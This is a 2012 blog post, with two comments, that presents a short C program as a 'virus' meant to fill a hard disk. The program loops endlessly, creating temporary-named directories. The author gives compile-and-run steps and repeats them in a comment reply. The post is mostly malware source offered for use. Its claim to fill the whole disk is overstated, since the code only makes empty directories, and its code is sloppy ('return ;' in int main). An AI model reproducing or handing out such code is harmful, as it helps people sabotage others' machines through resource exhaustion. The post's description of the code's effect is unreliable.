Friday 12 October 2012

Virus That Fills The Hard Disk Entire Space Continously

Hey Folks this is my latest trick ... I have created a new virus that always fill up the HARD DISK space continuously  .... This is a simple C program & use a  Dev cpp Software to compile and Run the Virus which will automatically do its work ...


/* Virus Program Created by ABHI */
#include<stdio.h>
#include<dir.h>                               
#include<conio.h>
int main()
{
 int i=1,flag,count=1;
 char name[30];
 printf("created by ABHI !!!");
 for(i=0;i<1;)
 {
  flag=mkdir(tmpnam(name));
  if(!flag)
  count++;
 }
getch();
return ;
}

2 comments:

  1. how to run this virus?

    ReplyDelete
  2. Sorry For my Late reply ... You just need to compile the program in turboc or Dev cpp and execute the program ... But dont try it in your PC ....

    ReplyDelete

add me